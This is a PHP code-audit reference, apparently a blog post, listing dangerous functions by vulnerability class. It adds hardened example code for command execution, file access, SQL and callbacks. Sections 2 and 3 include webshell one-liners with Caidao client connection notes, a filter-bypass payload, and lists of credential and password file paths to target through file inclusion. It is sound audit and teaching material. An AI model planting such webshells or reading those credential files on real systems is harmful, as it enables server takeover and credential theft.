PHP code audit - list of common sensitive functions in PHP


Preface

      List of common sensitive functions in PHP.


1. Sensitive functions in PHP - command injection vulnerability

     1)exec()

      Command execution function: runs an external program without displaying its output (exec() returns only the last line of the output unless an output array is passed).

<?php
	echo exec('whoami');
?>

     2) system()

      Command execution function: runs an external program and displays its output.

<?php
	system('whoami');
?>

     3)passthru ()

      The command executes a function, executes an external program, and displays the raw output.

<?php
	passthru('whoami');
?>

     4)shell_exec ()

      Execute the command through the shell environment and return the complete output as a string. It is worth mentioning that this function has the same effect as the execution operator (backtick ``).

<?php
	echo shell_exec('whoami');
	echo "<br>";
	echo `whoami`;
?>

     5)popen() / proc_open()

      These functions also execute a string as an OS command, but they return a file pointer (or process handle) rather than the command output. popen() takes two parameters: the command and the mode.

<?php
	$cmd = $_POST['cmd'].">> 1.txt";
	// at this point $cmd = "ipconfig >> 1.txt"
	popen("$cmd",'r'); // effectively popen("ipconfig >> 1.txt", "r"): the command output is written to 1.txt and read back by requesting 1.txt
?>
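The hardened counterpart of the exec()/system()/popen() snippets above, added here as an example (it is not code from the original article). The command table, the program paths and the request parameters $_GET['cmd'] and $_GET['arg'] are assumptions; the point is that client input never becomes command text, only an allow-listed key plus an escaped or shell-free argument.

```php
<?php
// Added example, not code from the original article. Hardened counterparts of
// the exec()/system()/popen() snippets above. The command table, program paths
// and request parameters are assumptions for illustration.
declare(strict_types=1);

/** Commands the application may run, keyed by the name accepted from the client. */
const ALLOWED_COMMANDS = [
    'disk'   => ['/bin/df', '-h'],
    'uptime' => ['/usr/bin/uptime'],
];

/**
 * Run an allow-listed command without a shell. With an array argument
 * (PHP >= 7.4) proc_open() starts the program directly, so shell
 * metacharacters in $arg (';', '|', backticks, ...) are never interpreted.
 */
function runWithoutShell(string $name, string $arg = ''): string
{
    if (!isset(ALLOWED_COMMANDS[$name])) {
        throw new InvalidArgumentException("command not allowed: $name");
    }
    // Defence in depth: even as a plain argv entry, keep the argument to a
    // conservative character set so it cannot turn into an unexpected option.
    if ($arg !== '' && !preg_match('/\A[A-Za-z0-9._\/]{1,64}\z/', $arg)) {
        throw new InvalidArgumentException('argument rejected');
    }
    $argv = ALLOWED_COMMANDS[$name];
    if ($arg !== '') {
        $argv[] = $arg;
    }
    // stdout to a pipe, stderr merged into stdout ('redirect' needs PHP >= 7.4)
    $spec = [1 => ['pipe', 'w'], 2 => ['redirect', 1]];
    $proc = proc_open($argv, $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('failed to start process');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    $status = proc_close($proc);
    if ($status !== 0) {
        throw new RuntimeException("command exited with status $status");
    }
    return $out;
}

/**
 * If a shell is unavoidable (PHP < 7.4, or a pipeline is needed), the command
 * text stays fixed and every client-supplied value goes through escapeshellarg().
 */
function runWithShell(string $name, string $arg = ''): string
{
    if (!isset(ALLOWED_COMMANDS[$name])) {
        throw new InvalidArgumentException("command not allowed: $name");
    }
    $cmd = implode(' ', array_map('escapeshellarg', ALLOWED_COMMANDS[$name]));
    if ($arg !== '') {
        $cmd .= ' ' . escapeshellarg($arg);
    }
    $output = [];
    $status = 0;
    exec($cmd . ' 2>&1', $output, $status);
    if ($status !== 0) {
        throw new RuntimeException("command exited with status $status");
    }
    return implode("\n", $output);
}

// Usage (request parameters are assumptions); the output is escaped before display.
// echo '<pre>' . htmlspecialchars(runWithoutShell($_GET['cmd'] ?? '', $_GET['arg'] ?? '')) . '</pre>';
```

When auditing, the thing to look for is the opposite of this shape: any of the functions listed above whose first argument is built from $_GET, $_POST, $_COOKIE, $_SERVER or a value read from a file or database.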

2. Sensitive functions in PHP - code injection vulnerabilities

     1)eval()

      This function evaluates the string as PHP code; the string must be valid PHP and must end with a semicolon. The fputs() and fopen() functions are typically used by a small shell to write out a larger one.

# not filtered
<?php @eval($_POST['cmd']);?>

# filtered with addslashes
# bypass with ${${}}
cmd=${${phpinfo()}}

     2)assert()

      This function checks the given assertion. An assertion is a term from logic, mainly used by programmers to express a hypothetical judgment. An assertion is either a string or a Boolean; when the assertion fails, a string expression is returned. If the assertion is a string, it is executed as PHP code, so a user-controlled argument to assert() is equivalent to eval().

<?php @assert($_GET["cmd"]);?>
cmd=phpinfo();

     3)preg_replace()

      If the /e modifier is used in the regular expression, the replacement string is evaluated as PHP code, which is a code execution vulnerability. The /e modifier was removed as of PHP 7.0.

<?php
	preg_replace("/test/e",$_POST["cmd"],"just test");
?>

     4)call_user_func()

      Call the first parameter as the callback function, and the subsequent parameters as the parameters of the callback function.

<?php
	# the submitted parameter becomes the argument of assert()
	call_user_func("assert",$_POST['cmd']);
?>

     5)call_user_func_array()

      Similar to call_user_func(), except that the parameters are passed as an array.

<?php
# the submitted parameter is passed to assert() as the first element of an array
# cmd=system(whoami)
# Caidao (webshell client) connection password: cmd
$cmd=$_POST['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);
?>

     6)create_function()

      Creates an anonymous function and returns a unique function name as a string, or false on error. It was removed after 7.0.

<?php
	$a = $_GET['a'];
	$func = create_function('$a','eval($a);');
	$func($a);
?>

     7)array_map()

      Applies a user-defined function to each value in the array and returns an array with the new values after the function has been applied. The number of arguments the callback accepts should match the number of arrays passed to array_map().

<?php
# command execution: http://localhost/123.php?func=system   cmd=whoami
# Caidao (webshell client) connection: http://localhost/123.php?func=assert   password: cmd
$func=$_GET['func'];
$cmd=$_POST['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
print_r($new_array); // array_map() returns an array; echo would only print "Array"
?>


     8)array_filter()

      Pass each value in the array to the callback function in turn. If the callback function returns true, the current value of the array array will be included in the returned result array. The key names of the array remain unchanged.

<?php 
	//?func=system&cmd=whoami
	$cmd=$_GET['cmd'];
	$array1=array($cmd);
	$func =$_GET['func'];
	array_filter($array1,$func);
?>

     9)usort() / uasort()

      usort() sorts an array using a user-defined comparison function.
      uasort() sorts the values in an array using a user-defined comparison function and maintains index association.

# requires PHP >=<5.6
# command execution: http://localhost/123.php?1=1+1&2=eval($_GET[cmd])&cmd=system(whoami);
# Caidao (webshell client) connection: http://localhost/123.php?1=1+1&2=eval($_POST[cmd])   password: cmd
<?php
    usort($_GET,'asse'.'rt');
?>


3. Sensitive functions in PHP - file inclusion vulnerability

      When any of these four functions includes a file, the file is parsed as PHP regardless of its type (image, txt, etc.).

     1) allow_url_include and allow_url_fopen

allow_url_fopen = On (whether to allow remote files to be opened)
allow_url_include = On (whether to allow include/require remote files)

      When set to On, remote files can be included directly. When an include($var) exists and $var is controllable, the $var variable can be used to execute PHP code. The default has been Off since PHP 5.2.0, and the configuration scope is PHP_INI_ALL.

<?php
include $_GET['a'];
?>

     2)include()

      If include() makes an error, it will only issue a warning and continue executing subsequent statements.

     3)include_once()

      Similar to include, the only difference is that if the code in the file is already included, it will not be included again.

     4)require()

      require(): if an error occurs during inclusion, for example because the file does not exist, the script exits directly without executing subsequent statements.

     5)require_once()

      Similar to require, the only difference is that if the code in the file is already included, it will not be included again.

     6) PHP pseudo-protocol

  • php://input: usable when allow_url_include = On; allow_url_fopen is not required. php://input is unavailable when the form is submitted with enctype="multipart/form-data".
  • php://filter: read-only; requires allow_url_fopen = On, allow_url_include does not need to be On.
  • phar://: PHP's archive wrapper; the file is treated as an archive regardless of its extension. Condition: PHP version >= 5.3.0.
  • zip://: the zip wrapper works like phar://. Condition: PHP version >= 5.3.0.
  • data:// URI scheme (for example data:text/plain): conditions: PHP version >= 5.2, allow_url_fopen = On and allow_url_include = On; similar to php://input, it comes up where file_get_contents() is used.
  • file://: accesses the local file system through the file protocol and reads file contents.

     7) Common file inclusion paths

      Windows:

  • C:\boot.ini // check the system version
  • C:\windows\system32\inetsrv\MetaBase.xml // IIS configuration file
  • C:\windows\repair\sam // stores the password of the initial Windows installation
  • C:\ProgramFiles\mysql\my.ini // MySQL configuration
  • C:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root password
  • C:\windows\php.ini // PHP configuration

      Linux/Unix:

  • /etc/passwd // account information
  • /etc/shadow // account password file
  • /usr/local/app/apache2/conf/httpd.conf // Apache2 default configuration file
  • /usr/local/app/apache2/conf/extra/httpd-vhost.conf // virtual host configuration
  • /usr/local/app/php5/lib/php.ini // PHP configuration
  • /etc/httpd/conf/httpd.conf // Apache configuration file
  • /etc/my.conf // MySQL configuration file

4. Sensitive functions in PHP - file upload/write

     1) file_put_contents(): Write a string into the file (it will be automatically created if it does not exist).
     2) move_uploaded_file() : Move the temporarily uploaded file.
     3) rename: rename files/directories
     4) rmdir: delete directories
     5) mkdir: create directories
     6) unlink: delete files
     7) fopen: open a file or URL; fputs/fwrite: write to the opened file

5. Sensitive functions in PHP - file reading/downloading

     1) file_get_contents(): Reads the entire file into a string. It is the preferred way to read a file's contents into a string.
     2) allow_url_fopen: When this configuration is On, remote files can be read. When an fopen($var) exists and $var is controllable, the variable can be used directly for SSRF. allow_url_fopen is On by default, and the configuration scope is PHP_INI_SYSTEM.

<?php
fopen($_GET['a'], 'r');
?>

     3) Any file download keyword: download() with filepath or file
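One helper that confines a client-supplied file name to a base directory, then reused for the three cases the audit sections above describe: include (section 3), file_put_contents()/move_uploaded_file() (section 4) and file_get_contents()/fopen() (section 5). This is an added example, not code from the original article; the directory names, the page allow-list and the request parameters are assumptions.

```php
<?php
// Added example, not code from the original article. confinedPath() rejects
// stream wrappers, null bytes and anything that resolves outside the base
// directory; the three callers show it applied to include, download and upload.
// Directory names, the page allow-list and request parameters are assumptions.
declare(strict_types=1);

/**
 * Resolve $name inside $baseDir and return the real path. Rejects stream
 * wrappers (php://, data://, phar://, zip://, file:// ...), null bytes and any
 * result outside $baseDir, which covers ../ traversal and symlinks.
 * With $mustExist = false the parent directory is resolved instead, for files
 * that are about to be created.
 */
function confinedPath(string $baseDir, string $name, bool $mustExist = true): string
{
    if ($name === '' || strpos($name, "\0") !== false || strpos($name, '://') !== false) {
        throw new InvalidArgumentException('invalid file name');
    }
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory does not exist');
    }
    $candidate = $base . DIRECTORY_SEPARATOR . $name;
    if ($mustExist) {
        $real = realpath($candidate);
    } else {
        $parent = realpath(dirname($candidate));
        $real = $parent === false ? false : $parent . DIRECTORY_SEPARATOR . basename($candidate);
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        throw new InvalidArgumentException('path escapes the base directory');
    }
    return $real;
}

/** Section 3: include only allow-listed page names, and only from the template directory. */
function renderPage(string $templateDir, string $page): void
{
    $allowed = ['home', 'about', 'contact'];
    if (!in_array($page, $allowed, true)) {
        throw new InvalidArgumentException('unknown page');
    }
    include confinedPath($templateDir, $page . '.php');
}

/** Section 5: read a file chosen by the client, but never a URL or wrapper. */
function readDownload(string $downloadDir, string $file): string
{
    return file_get_contents(confinedPath($downloadDir, basename($file)));
}

/** Section 4: store an upload under a server-generated name with a fixed extension. */
function storeUpload(string $uploadDir, array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $target = confinedPath($uploadDir, bin2hex(random_bytes(16)) . '.dat', false);
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store upload');
    }
    return $target;
}

// Usage (request parameters are assumptions):
// renderPage(__DIR__ . '/templates', $_GET['page'] ?? 'home');
// echo readDownload(__DIR__ . '/downloads', $_GET['file'] ?? '');
// echo storeUpload(__DIR__ . '/uploads', $_FILES['f'] ?? []);
```

The allow-list in renderPage() is the real control; the realpath() check underneath it is defence in depth for the cases where an allow-list is not possible, and it is what stops the ../ and wrapper tricks that the audit sections above enumerate.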

6. Sensitive functions in PHP - SQL injection

     1) SQL injection requires operating the database, so it generally looks for SQL statement keywords: insert, delete, update, select, and checks whether the passed variable parameters are user-controllable and whether they have been safely processed.
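The two shapes an auditor compares at those keywords, as an added example that is not code from the original article: a request value concatenated into the statement text beside the prepared-statement form. An in-memory SQLite database stands in for the real one so the script runs offline; the table, rows and parameter names are constructed.

```php
<?php
// Added example, not code from the original article. An in-memory SQLite
// database stands in for the real one so the script runs offline; the table,
// rows and parameter names are constructed for the demonstration.
declare(strict_types=1);

function connect(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)');
    $pdo->exec("INSERT INTO users (name, role) VALUES ('alice', 'admin'), ('bob', 'user')");
    return $pdo;
}

/** The pattern the audit keywords point at: a request value concatenated into the SQL text. */
function findUserVulnerable(PDO $pdo, string $name): array
{
    $sql = "SELECT id, name, role FROM users WHERE name = '" . $name . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

/** Hardened form: the statement is fixed and the value travels as a bound parameter. */
function findUser(PDO $pdo, string $name): array
{
    $stmt = $pdo->prepare('SELECT id, name, role FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Identifiers cannot be bound as parameters, so a sort column is allow-listed instead. */
function listUsersSortedBy(PDO $pdo, string $column): array
{
    $allowed = ['id', 'name', 'role'];
    if (!in_array($column, $allowed, true)) {
        throw new InvalidArgumentException("sort column not allowed: $column");
    }
    return $pdo->query("SELECT id, name, role FROM users ORDER BY $column")->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = connect();
// A legitimate value containing a quote is enough to show the difference: the
// concatenated version hands the quote to the SQL parser, the bound version
// treats it as data.
$name = "o'brien";
print_r(findUser($pdo, $name));
try {
    print_r(findUserVulnerable($pdo, $name));
} catch (PDOException $e) {
    echo 'concatenated query failed: ', $e->getMessage(), PHP_EOL;
}
print_r(listUsersSortedBy($pdo, 'name'));
```

During an audit, a quote-bearing value that produces a database error is the quickest confirmation that the parameter reaches the SQL parser unprocessed; the fix is the findUser() shape, with allow-listing reserved for identifiers that cannot be bound.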

7. Sensitive functions in PHP - variable coverage

      Variable overwriting means replacing the program's original variable values with parameter values we choose. Generally, a variable overwriting vulnerability has to be combined with other functions of the program to achieve a complete attack.
     1) $$: represents variable variables.

<?php
$var='hello';
$$var='world'; //$hello='world'
echo $var.'</br>';
echo $$var.'</br>';
echo $hello;
?>

     2) extract(): Import variables from the array into the current symbol table.

<?php
$var="don9";
extract($_GET);
if($var == "sec"){
    echo $var;
}
else echo $var;
?>

[Screenshots: output before overwriting and after overwriting]
     3) parse_str(): Parse the query string into variables.
     4) import_request_variables(): Import GET/POST/Cookie variables into the global scope (equivalent to turning on global variable registration), so if register_globals is disabled but you want to use some global variables, you can use this function.
     5) mb_parse_str(): Parse GET/POST/COOKIE data and set global variables.
     6) When register_globals=On, variables submitted through GET directly overwrite existing ones. This feature is deprecated as of PHP 5.3.0 and removed as of PHP 5.4.0.
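The extract() and parse_str() calls from this section in forms that cannot overwrite existing variables, next to the explicit alternative of copying only the keys a handler expects, as an added example (not code from the original article). The constructed request and the parameter names are assumptions.

```php
<?php
// Added example, not code from the original article. Shows extract() with
// EXTR_SKIP, parse_str() into a result array, and an explicit allow-list of
// expected keys. The constructed request and parameter names are assumptions.
declare(strict_types=1);

/** Copies only expected keys out of a request array; everything else is ignored. */
function readParams(array $source, array $defaults): array
{
    $out = [];
    foreach ($defaults as $key => $default) {
        $out[$key] = isset($source[$key]) ? (string) $source[$key] : $default;
    }
    return $out;
}

function demo(array $query): array
{
    // Same situation as the extract($_GET) snippet above: the script has its own
    // $var and $isAdmin, and the request tries to replace them and add $debug.
    $var = 'don9';
    $isAdmin = false;

    // 1) extract() with EXTR_SKIP keeps variables that already exist, but it
    //    still creates variables for unknown keys ($debug appears), so it
    //    remains a poor fit for request data.
    extract($query, EXTR_SKIP);

    // 2) parse_str() into a result array rather than into the symbol table
    //    (the one-argument form was removed in PHP 8.0).
    parse_str(http_build_query($query), $parsed);

    // 3) Copy the expected keys explicitly: the form to prefer in new code.
    $params = readParams($query, ['var' => 'don9', 'page' => '1']);

    return [
        'var'          => $var,
        'isAdmin'      => $isAdmin,
        'debugCreated' => isset($debug),
        'parsed'       => $parsed,
        'params'       => $params,
    ];
}

// Constructed request equivalent to ?var=sec&isAdmin=1&debug=1
print_r(demo(['var' => 'sec', 'isAdmin' => '1', 'debug' => '1']));
```

When auditing, the question to ask at every extract(), parse_str(), mb_parse_str() or $$ is whether the keys can come from the request; if they can, any variable assigned earlier in the script, and in particular any flag used later for authorisation, is a candidate for overwriting.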

8. Sensitive functions in PHP - dynamic functions

     1) When using dynamic functions, if the user has controllable variables, it can cause the attacker to execute arbitrary functions.

<?php
	$myfunc = $_GET['myfunc'];
	$myfunc();
?>
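How to keep both the callback-taking functions of section 2 (call_user_func, array_map, array_filter, usort, ...) and the dynamic call above away from user-controlled function names, as an added example that is not code from the original article. The request supplies a key into a dispatch table, never a PHP function name; the table, the operations and the request parameters are assumptions.

```php
<?php
// Added example, not code from the original article. A dispatch table of
// developer-written closures replaces user-supplied callable names for the
// functions in section 2 and the $myfunc() call in section 8. The operations
// and request parameters are assumptions.
declare(strict_types=1);

/**
 * The only operations a request may select. The client sends a *key*, never a
 * function name, so strings such as "assert" or "system" can never become
 * callable whatever the request contains.
 */
function allowedOperations(): array
{
    return [
        'upper' => fn(string $s): string => strtoupper($s),
        'trim'  => fn(string $s): string => trim($s),
        'len'   => fn(string $s): int => strlen($s),
    ];
}

/** The safe shape of array_map($func, $array): $func comes from the table, not the request. */
function applyOperation(string $opName, array $values): array
{
    $ops = allowedOperations();
    if (!array_key_exists($opName, $ops)) {
        throw new InvalidArgumentException("unknown operation: $opName");
    }
    return array_map($ops[$opName], array_map('strval', $values));
}

/** The safe shape of usort(): the comparator is fixed, the client chooses only the direction. */
function sortValues(array $values, string $direction): array
{
    $dir = $direction === 'desc' ? -1 : 1;
    usort($values, fn($a, $b) => $dir * strcmp((string) $a, (string) $b));
    return $values;
}

/**
 * Replacement for the removed /e modifier: preg_replace_callback() with a
 * closure written by the developer. The matched text is data, not code.
 */
function upperCaseWords(string $text): string
{
    return preg_replace_callback('/\b[a-z]+\b/', fn(array $m): string => strtoupper($m[0]), $text);
}

// Constructed inputs: a permitted key works, an arbitrary function name is rejected.
print_r(applyOperation('upper', ['alpha', 'beta']));
print_r(sortValues(['b', 'c', 'a'], 'desc'));
echo upperCaseWords('just test'), PHP_EOL;
try {
    applyOperation('system', ['whoami']);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Note that checking a request value with is_callable() or function_exists() is not a substitute for the table: both only prove that the name resolves to something callable, which is exactly what an attacker wants.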

9. Sensitive functions in PHP - PHP environment settings

     1) open_basedir setting

      open_basedir can limit the directories that applications can access. Check whether open_basedir has been set. Of course, some are set through the web server, such as: apache's php_admin_value, nginx+fcgi controls php settings through conf.

     2) allow_url_fopen setting

      If allow_url_fopen=ON, then PHP can read remote files for operation, which can easily be exploited by attackers.

     3) allow_url_include setting

      If allow_url_include=ON, then php can include remote files, causing serious vulnerabilities.

     4) safe_mode_exec_dir setting

      This option can control the directory of external commands that can be called by PHP. If there are external commands called in the PHP program, then specifying the directory of the external commands can control the risk of the program.

     5) magic_quotes_gpc settings

      This option escapes special characters in submitted parameters. It is recommended to set magic_quotes_gpc=On. This feature is deprecated as of PHP 5.3.0 and removed as of PHP 5.4.0.

     6) register_globals setting

      Enabling this option will cause PHP to register all externally submitted variables as global variables, with serious consequences. This feature is deprecated as of PHP 5.3.0 and will be removed as of PHP 5.4.0.

     7) safe_mode setting

      safe_mode is an important security feature of PHP and is recommended to be turned on.

     8) session_use_trans_sid setting

      Enabling session.use_trans_sid causes PHP to pass the session ID through the URL, making it easier for an attacker to hijack the current session or trick the user into using an existing session that is already controlled by the attacker.

     9) display_errors setting

      If this option is enabled, PHP will output any error or warning information, which can be used by attackers to obtain sensitive information such as the web root path.

     10) disable_functions setting

      This directive allows you to disable certain functions for security reasons. It takes a comma-delimited list of function names. disable_functions is not affected by safe mode. The directive can only be set in php.ini; for example, it cannot be set in httpd.conf. When you use it to disable dangerous functions, remember to add dl() to the list as well, because an attacker can otherwise use dl() to load a custom PHP extension and break out of the disable_functions restriction.
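A small runtime check for the php.ini settings discussed in this section, as an added example (not code from the original article). It reads each setting through ini_get() and reports the weak values named above; the function name, the finding texts and the list of functions expected in disable_functions (the command execution functions from section 1 plus dl()) are assumptions.

```php
<?php
// Added example, not code from the original article. Reports the weak php.ini
// values described in section 9; run it from the CLI or from a protected admin
// script. The function name, finding texts and the expected disable_functions
// entries are assumptions.
declare(strict_types=1);

/** Returns a list of findings; an empty list means nothing was flagged. */
function auditPhpIni(): array
{
    $findings = [];
    // ini_get() returns the raw string ("1", "On", "", "Off", ...); normalise it.
    $on = static fn(string $key): bool => (bool) filter_var(ini_get($key), FILTER_VALIDATE_BOOLEAN);

    if ($on('allow_url_include')) {
        $findings[] = 'allow_url_include is On: include/require can load remote code';
    }
    if ($on('allow_url_fopen')) {
        $findings[] = 'allow_url_fopen is On: fopen()/file_get_contents() accept URLs (SSRF exposure)';
    }
    if ($on('display_errors')) {
        $findings[] = 'display_errors is On: errors and paths are shown to clients';
    }
    if ($on('session.use_trans_sid')) {
        $findings[] = 'session.use_trans_sid is On: the session id is carried in URLs';
    }
    if ((string) ini_get('open_basedir') === '') {
        $findings[] = 'open_basedir is unset: scripts may access any path the PHP user can';
    }
    // register_globals no longer exists in current PHP; ini_get() returns false then.
    if (ini_get('register_globals') !== false && $on('register_globals')) {
        $findings[] = 'register_globals is On: request variables become globals';
    }

    $disabled = array_filter(array_map('trim', explode(',', (string) ini_get('disable_functions'))));
    $expected = ['exec', 'system', 'passthru', 'shell_exec', 'popen', 'proc_open', 'dl'];
    foreach ($expected as $fn) {
        if (!in_array($fn, $disabled, true)) {
            $findings[] = "$fn is not listed in disable_functions";
        }
    }
    return $findings;
}

foreach (auditPhpIni() as $finding) {
    echo $finding, PHP_EOL;
}
```

Because disable_functions and open_basedir are PHP_INI_SYSTEM settings, this check only reports; the fix has to be made in php.ini (or the web server's per-vhost PHP configuration) and the service restarted.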

Origin blog.csdn.net/qq_44029310/article/details/127078308